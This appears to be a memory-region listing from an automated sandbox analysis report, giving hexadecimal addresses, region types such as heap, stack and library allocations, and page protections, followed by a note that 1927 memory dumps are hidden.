page read and write
5403000
trusted library allocation
page read and write
1A57D057000
heap
page read and write
CAB000
stack
page read and write
57A0000
trusted library allocation
page read and write
5431000
trusted library allocation
page read and write
7E22000
trusted library allocation
page read and write
1A578CAE000
heap
page read and write
55CE000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
2AC5AC2E000
heap
page read and write
4E90000
trusted library allocation
page read and write
53F0000
trusted library allocation
page read and write
31BD000
trusted library allocation
page read and write
9C8E000
trusted library allocation
page read and write
60A0000
trusted library allocation
page read and write
1A57D0CA000
heap
page read and write
2AC58B58000
heap
page read and write
5658000
trusted library allocation
page read and write
4D9E000
trusted library allocation
page read and write
14DE000
stack
page read and write
4D96000
trusted library allocation
page read and write
4890000
heap
page read and write
1A578CAB000
heap
page read and write
2AC5D019000
heap
page read and write
47DE000
stack
page read and write
2AC5AB2E000
heap
page read and write
2AC5D0AC000
heap
page read and write
7780000
trusted library allocation
page read and write
5610000
trusted library allocation
page read and write
11A0000
heap
page read and write
4DEB000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
23C0000
trusted library allocation
page read and write
2AC5CABC000
heap
page read and write
2AC5AB2E000
heap
page read and write
538C000
trusted library allocation
page read and write
1A578D3B000
heap
page read and write
55AD000
trusted library allocation
page read and write
5668000
trusted library allocation
page read and write
B3D34FE000
stack
page read and write
5354000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
2AC5D0E2000
heap
page read and write
67D000
trusted library allocation
page execute and read and write
2278000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
1A57A750000
heap
page read and write
5534000
trusted library allocation
page read and write
562C000
trusted library allocation
page read and write
1A57C9DF000
heap
page read and write
2AC5C664000
heap
page read and write
2AC58D8E000
heap
page read and write
1A57AAA7000
heap
page read and write
5170000
trusted library allocation
page read and write
2F20000
trusted library allocation
page read and write
4ED5000
trusted library allocation
page read and write
36EE000
trusted library allocation
page read and write
6DDE000
stack
page read and write
70D0000
trusted library allocation
page read and write
156A000
heap
page read and write
1A57D0AB000
heap
page read and write
6E3D000
stack
page read and write
1A57C58E000
heap
page read and write
1A57CADD000
heap
page read and write
506E000
trusted library allocation
page read and write
1A578DAB000
heap
page read and write
2AC5B3F1000
heap
page read and write
2AC5C492000
heap
page read and write
2AA0000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
2AC5AB2E000
heap
page read and write
55DF000
trusted library allocation
page read and write
5198000
trusted library allocation
page read and write
4FA5000
heap
page read and write
509E000
trusted library allocation
page read and write
2A6D000
trusted library allocation
page execute and read and write
5094000
trusted library allocation
page read and write
7240000
trusted library allocation
page read and write
65F0000
trusted library allocation
page execute and read and write
52F8000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
2607000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
63CB000
stack
page read and write
6A0000
trusted library allocation
page read and write
586C4FD000
stack
page read and write
4EF4000
trusted library allocation
page read and write
37B0000
trusted library allocation
page read and write
67F0000
trusted library allocation
page execute and read and write
1A57D063000
heap
page read and write
2AC5AA5B000
heap
page read and write
7089000
trusted library allocation
page read and write
481E000
stack
page read and write
2AC5D02A000
heap
page read and write
6BAD000
stack
page read and write
48A1000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
1A57AAF7000
heap
page read and write
2AC5CF06000
heap
page read and write
1A57AAFD000
heap
page read and write
5435000
trusted library allocation
page read and write
5154000
trusted library allocation
page read and write
4E82000
trusted library allocation
page read and write
563B000
trusted library allocation
page read and write
2A81000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
1A57D11B000
heap
page read and write
503C000
trusted library allocation
page read and write
507B000
trusted library allocation
page read and write
7FFB1C302000
unkown
page readonly
B3D3FFF000
stack
page read and write
1A578D11000
heap
page read and write
3739000
trusted library allocation
page read and write
150A000
trusted library allocation
page execute and read and write
227FF7C0000
heap
page read and write
1A578D3C000
heap
page read and write
B3D39FE000
stack
page read and write
586CAFE000
stack
page read and write
A50000
trusted library allocation
page execute and read and write
1A578DAB000
heap
page read and write
2AC5C540000
heap
page read and write
1A57AAA9000
heap
page read and write
5680000
trusted library allocation
page read and write
4DD7000
trusted library allocation
page read and write
7C1000
heap
page read and write
33FF000
trusted library allocation
page read and write
74C000
stack
page read and write
1A57AAC0000
heap
page read and write
6432000
trusted library allocation
page read and write
6A01000
trusted library allocation
page read and write
5632000
trusted library allocation
page read and write
553A000
trusted library allocation
page read and write
36BA000
trusted library allocation
page read and write
73D1D000
unkown
page read and write
1A57AB9E000
heap
page read and write
1A57CC39000
heap
page read and write
5596000
trusted library allocation
page read and write
787000
heap
page read and write
3779000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
23D0000
trusted library allocation
page execute and read and write
7760000
trusted library allocation
page read and write
2AC5BD8D000
heap
page read and write
554B000
trusted library allocation
page read and write
73D00000
unkown
page readonly
4ED9000
trusted library allocation
page read and write
1A57AAF7000
heap
page read and write
55B1000
trusted library allocation
page read and write
53A8000
trusted library allocation
page read and write
7570000
trusted library allocation
page read and write
5850000
trusted library allocation
page read and write
2AC5CFDE000
heap
page read and write
1A57AB9E000
heap
page read and write
1A578DD7000
heap
page read and write
7DC0000
trusted library allocation
page read and write
1A57D10C000
heap
page read and write
3324000
trusted library allocation
page read and write
2720000
heap
page read and write
1A57CE49000
heap
page read and write
5650000
trusted library allocation
page execute and read and write
1A57AB9E000
heap
page read and write
4E4B000
trusted library allocation
page read and write
5409000
trusted library allocation
page read and write
1A57C4F1000
heap
page read and write
2749000
heap
page read and write
2799000
trusted library allocation
page read and write
4F30000
trusted library allocation
page read and write
1A57C68D000
heap
page read and write
5285000
trusted library allocation
page read and write
1A57D0D6000
heap
page read and write
540B000
trusted library allocation
page read and write
2AC5D093000
heap
page read and write
1A57C593000
heap
page read and write
5122000
trusted library allocation
page read and write
607E000
stack
page read and write
227FF89C000
heap
page read and write
4F00000
trusted library allocation
page read and write
7F200000
trusted library allocation
page execute and read and write
565D000
trusted library allocation
page read and write
1A57AD1A000
heap
page read and write
4E47000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
2AC5CAC1000
heap
page read and write
9CB0000
trusted library allocation
page execute and read and write
A0F0000
heap
page read and write
8970000
trusted library allocation
page read and write
4F35000
trusted library allocation
page read and write
6F96000
heap
page read and write
227FFAC0000
heap
page read and write
7260000
trusted library allocation
page read and write
375A000
trusted library allocation
page read and write
703A000
heap
page read and write
1A57D0AB000
heap
page read and write
527F000
trusted library allocation
page read and write
540D000
trusted library allocation
page read and write
5657000
trusted library allocation
page read and write
7461000
heap
page read and write
529C000
trusted library allocation
page read and write
2AC5AA53000
heap
page read and write
57C0000
trusted library allocation
page execute and read and write
7230000
trusted library allocation
page read and write
1A57CB32000
heap
page read and write
4D51000
trusted library allocation
page read and write
1502000
trusted library allocation
page read and write
1A57AB17000
heap
page read and write
5343000
trusted library allocation
page read and write
227FF6E0000
heap
page read and write
1A578CA8000
heap
page read and write
9CFD000
trusted library allocation
page read and write
732D000
stack
page read and write
1A57D08F000
heap
page read and write
564D000
trusted library allocation
page read and write
53BA000
trusted library allocation
page read and write
5662000
trusted library allocation
page read and write
227FF87B000
heap
page read and write
517F000
trusted library allocation
page read and write
1A578DC1000
heap
page read and write
2AC5D07B000
heap
page read and write
529E000
trusted library allocation
page read and write
6E72000
heap
page read and write
7071000
trusted library allocation
page read and write
1A57D12C000
heap
page read and write
4FB7000
heap
page read and write
2AC5BD8E000
heap
page read and write
7D5E000
stack
page read and write
336E000
trusted library allocation
page read and write
2AC5AA30000
heap
page read and write
1A57C692000
heap
page read and write
9A8E000
heap
page read and write
2A85000
trusted library allocation
page execute and read and write
5AA0000
trusted library allocation
page execute and read and write
279B000
trusted library allocation
page read and write
54D2000
trusted library allocation
page read and write
2AC5C61C000
heap
page read and write
5F21000
trusted library allocation
page read and write
5176000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
23AE000
stack
page read and write
2FA0000
heap
page read and write
7578000
trusted library allocation
page read and write
546F000
stack
page read and write
1A57AAF9000
heap
page read and write
532C000
trusted library allocation
page read and write
54D0000
trusted library allocation
page read and write
2AC5C86F000
heap
page read and write
7E05000
trusted library allocation
page read and write
2AC5D0E2000
heap
page read and write
4E7F000
trusted library allocation
page read and write
3753000
trusted library allocation
page read and write
5196000
trusted library allocation
page read and write
6D9E000
stack
page read and write
1A57D0CA000
heap
page read and write
2AC5C6BA000
heap
page read and write
4DCC000
trusted library allocation
page read and write
53FD000
trusted library allocation
page read and write
2AC5AC2E000
heap
page read and write
2AC5BD8D000
heap
page read and write
559A000
trusted library allocation
page read and write
1A57D049000
heap
page read and write
54DA000
trusted library allocation
page read and write
7551000
trusted library allocation
page read and write
35AE000
trusted library allocation
page read and write
5640000
trusted library allocation
page read and write
2A7C000
trusted library allocation
page read and write
5656000
trusted library allocation
page read and write
2AC5C770000
heap
page read and write
4D7F000
trusted library allocation
page read and write
77D0000
trusted library allocation
page read and write
1A57D0F1000
heap
page read and write
3E1000
unkown
page write copy
658A000
heap
page read and write
1A57BFF9000
heap
page read and write
5098000
trusted library allocation
page read and write
7200000
trusted library allocation
page read and write
5D99000
trusted library allocation
page read and write
1A57AAA3000
heap
page read and write
5317000
trusted library allocation
page read and write
2776000
trusted library allocation
page read and write
4C20000
trusted library allocation
page read and write
4EBC000
trusted library allocation
page read and write
5311000
trusted library allocation
page read and write
2F10000
trusted library allocation
page read and write
1A57AAC7000
heap
page read and write
6A6F000
stack
page read and write
5566000
trusted library allocation
page read and write
6386000
trusted library allocation
page read and write
2AC5B173000
heap
page read and write
5B39000
heap
page read and write
3705000
trusted library allocation
page read and write
53F2000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
4FB1000
heap
page read and write
1A57CE4A000
heap
page read and write
2AC5AC2E000
heap
page read and write
2AC5C502000
heap
page read and write
2AC5A6E0000
heap
page read and write
72D0000
heap
page read and write
2AC5AA47000
heap
page read and write
52B5000
trusted library allocation
page read and write
1A57AAD0000
heap
page read and write
2AC5ABC3000
heap
page read and write
50D0000
trusted library allocation
page read and write
7CE0000
trusted library allocation
page read and write
4EBC000
stack
page read and write
4DB9000
trusted library allocation
page read and write
5D71000
trusted library allocation
page read and write
5313000
trusted library allocation
page read and write
4D50000
heap
page execute and read and write
2AC58BFA000
heap
page read and write
1500000
trusted library allocation
page read and write
771E000
stack
page read and write
4DE7000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
5632000
trusted library allocation
page read and write
2AC5AA96000
heap
page read and write
638F000
stack
page read and write
14E0000
trusted library allocation
page read and write
1A57AC9E000
heap
page read and write
2AC5B17E000
heap
page read and write
73D1D000
unkown
page read and write
2AC58BAA000
heap
page read and write
5379000
trusted library allocation
page read and write
5DDC000
trusted library allocation
page read and write
1A57AC9E000
heap
page read and write
70E000
stack
page read and write
1A57C744000
heap
page read and write
2A50000
trusted library allocation
page read and write
664E000
stack
page read and write
4F1E000
trusted library allocation
page read and write
2AC5C610000
heap
page read and write
2AC58B5F000
heap
page read and write
1A57AAA1000
heap
page read and write
6800000
heap
page read and write
4EA9000
trusted library allocation
page read and write
27C4000
trusted library allocation
page read and write
6AB000
trusted library allocation
page execute and read and write
1517000
trusted library allocation
page execute and read and write
1A57D09B000
heap
page read and write
2AC5D0E2000
heap
page read and write
5549000
trusted library allocation
page read and write
2AC58BD3000
heap
page read and write
2AC5C672000
heap
page read and write
2AC5AB2E000
heap
page read and write
4F39000
trusted library allocation
page read and write
9CCA000
trusted library allocation
page read and write
4E26000
trusted library allocation
page read and write
227FF8E9000
heap
page read and write
4E96000
trusted library allocation
page read and write
1A57C58E000
heap
page read and write
4ED7000
trusted library allocation
page read and write
1A57AB9E000
heap
page read and write
343E000
trusted library allocation
page read and write
2AC5CCC6000
heap
page read and write
14E3000
trusted library allocation
page execute and read and write
4E3F000
trusted library allocation
page read and write
72E0000
trusted library allocation
page read and write
1A57AAB3000
heap
page read and write
4C2E000
stack
page read and write
8810000
trusted library allocation
page read and write
1A57B6D6000
heap
page read and write
8860000
trusted library allocation
page execute and read and write
1A57AAEB000
heap
page read and write
1A57CE38000
heap
page read and write
2AC5AB2E000
heap
page read and write
4DDF000
trusted library allocation
page read and write
A4F000
stack
page read and write
2AC5AB2E000
heap
page read and write
2AC5AA73000
heap
page read and write
2AC5CDD8000
heap
page read and write
4C10000
trusted library allocation
page read and write
4DC6000
trusted library allocation
page read and write
680000
trusted library allocation
page read and write
2AC58D8C000
heap
page read and write
11A8000
heap
page read and write
533D000
trusted library allocation
page read and write
2AC5C51D000
heap
page read and write
1A57CAE1000
heap
page read and write
2AC0000
heap
page read and write
F16CCFB000
stack
page read and write
5690000
trusted library allocation
page read and write
4E33000
trusted library allocation
page read and write
2AC58B00000
heap
page read and write
5594000
trusted library allocation
page read and write
4F7D000
heap
page read and write
2F29000
trusted library allocation
page read and write
1A57CAE0000
heap
page read and write
839B000
trusted library allocation
page read and write
1A57C9BB000
heap
page read and write
2AC5AB2E000
heap
page read and write
1A57D083000
heap
page read and write
4E67000
trusted library allocation
page read and write
1A57AB06000
heap
page read and write
3740000
trusted library allocation
page read and write
2AC5CA53000
heap
page read and write
2AC58BA8000
heap
page read and write
7FFB23B25000
unkown
page readonly
4790000
heap
page execute and read and write
560D000
trusted library allocation
page read and write
5388000
trusted library allocation
page read and write
4D9A000
trusted library allocation
page read and write
1A578D68000
heap
page read and write
A90000
heap
page execute and read and write
1A578DFB000
heap
page read and write
42C0000
trusted library allocation
page read and write
559C000
trusted library allocation
page read and write
61C0000
trusted library allocation
page read and write
1A57C9DE000
heap
page read and write
2AC5C66E000
heap
page read and write
351000
unkown
page read and write
56C8000
trusted library allocation
page read and write
1A578D94000
heap
page read and write
8348000
trusted library allocation
page read and write
2AC58BA3000
heap
page read and write
2AC5CDC7000
heap
page read and write
6A5000
trusted library allocation
page execute and read and write
2A1B000
trusted library allocation
page read and write
82D0000
trusted library allocation
page read and write
2AC5AA60000
heap
page read and write
563C000
trusted library allocation
page read and write
5545000
trusted library allocation
page read and write
49F3000
trusted library allocation
page read and write
5187000
trusted library allocation
page read and write
3314000
trusted library allocation
page read and write
2AC5B64E000
heap
page read and write
1A57BDF0000
heap
page read and write
61F5000
trusted library allocation
page read and write
1A57D104000
heap
page read and write
1A57AB9E000
heap
page read and write
563A000
trusted library allocation
page read and write
4EEA000
trusted library allocation
page read and write
1A57C68D000
heap
page read and write
55D4000
trusted library allocation
page read and write
5368000
trusted library allocation
page read and write
7FFB1C2E1000
unkown
page execute read
73D16000
unkown
page readonly
2AC5CFF3000
heap
page read and write
1A57CB3A000
heap
page read and write
4D45000
trusted library allocation
page read and write
560A000
trusted library allocation
page read and write
83D0000
trusted library allocation
page read and write
1A57C4E1000
heap
page read and write
7DA0000
heap
page read and write
63F0000
trusted library allocation
page read and write
54FE000
trusted library allocation
page read and write
1A57C58F000
heap
page read and write
533B000
trusted library allocation
page read and write
61E6000
trusted library allocation
page read and write
5600000
trusted library allocation
page execute and read and write
36CC000
trusted library allocation
page read and write
2AC5D026000
heap
page read and write
1A57AAF7000
heap
page read and write
1A57D0F4000
heap
page read and write
AC0000
heap
page read and write
54F5000
trusted library allocation
page read and write
2CCE000
heap
page read and write
7CD0000
trusted library allocation
page execute and read and write
2AC5AC20000
heap
page read and write
53D9000
trusted library allocation
page read and write
6016000
trusted library allocation
page read and write
1A57C6E1000
heap
page read and write
512A000
trusted library allocation
page read and write
6580000
heap
page read and write
1A578DAB000
heap
page read and write
2E8E000
stack
page read and write
A0E0000
trusted library allocation
page execute and read and write
563E000
trusted library allocation
page read and write
52E1000
trusted library allocation
page read and write
4F09000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
4DC8000
trusted library allocation
page read and write
2AC5CDC7000
heap
page read and write
5796000
trusted library allocation
page read and write
6F7A000
stack
page read and write
2850000
trusted library section
page read and write
55BC000
trusted library allocation
page read and write
2A35000
trusted library allocation
page read and write
77C0000
trusted library allocation
page read and write
784000
heap
page read and write
1A57D104000
heap
page read and write
54A6000
trusted library allocation
page read and write
13DE000
stack
page read and write
53A5000
trusted library allocation
page read and write
2AC5CA70000
heap
page read and write
532E000
trusted library allocation
page read and write
5362000
trusted library allocation
page read and write
50BB000
trusted library allocation
page read and write
1A57BDF1000
heap
page read and write
2AC5ACA0000
heap
page read and write
55CC000
trusted library allocation
page read and write
5547000
trusted library allocation
page read and write
370B000
trusted library allocation
page read and write
54A8000
trusted library allocation
page read and write
4E0F000
trusted library allocation
page read and write
2F2D000
trusted library allocation
page execute and read and write
36FE000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
1A57AAF7000
heap
page read and write
1A57D0CA000
heap
page read and write
707E000
stack
page read and write
1A578DFE000
heap
page read and write
26A8000
stack
page read and write
2F45000
trusted library allocation
page execute and read and write
5504000
trusted library allocation
page read and write
2AC58D8B000
heap
page read and write
2F5E000
trusted library allocation
page read and write
1A578D4D000
heap
page read and write
2AC5D093000
heap
page read and write
277E000
heap
page read and write
6690000
trusted library allocation
page execute and read and write
2AC58BFE000
heap
page read and write
2AC5C61D000
heap
page read and write
5A8E000
stack
page read and write
2AC58D8E000
heap
page read and write
2EF0000
trusted library section
page read and write
1A57AB9E000
heap
page read and write
541C000
trusted library allocation
page read and write
5055000
trusted library allocation
page read and write
341000
unkown
page execute read
1A57AC9E000
heap
page read and write
2AC5CFF7000
heap
page read and write
8F8D000
trusted library allocation
page read and write
5ACC000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
4E4D000
trusted library allocation
page read and write
1A57AB2F000
heap
page read and write
4D43000
trusted library allocation
page read and write
515E000
trusted library allocation
page read and write
4E9A000
trusted library allocation
page read and write
538E000
trusted library allocation
page read and write
5634000
trusted library allocation
page read and write
9CA0000
trusted library allocation
page execute and read and write
5513000
trusted library allocation
page read and write
2AC5AB2E000
heap
page read and write
There are 1927 hidden memdumps, click here to show them.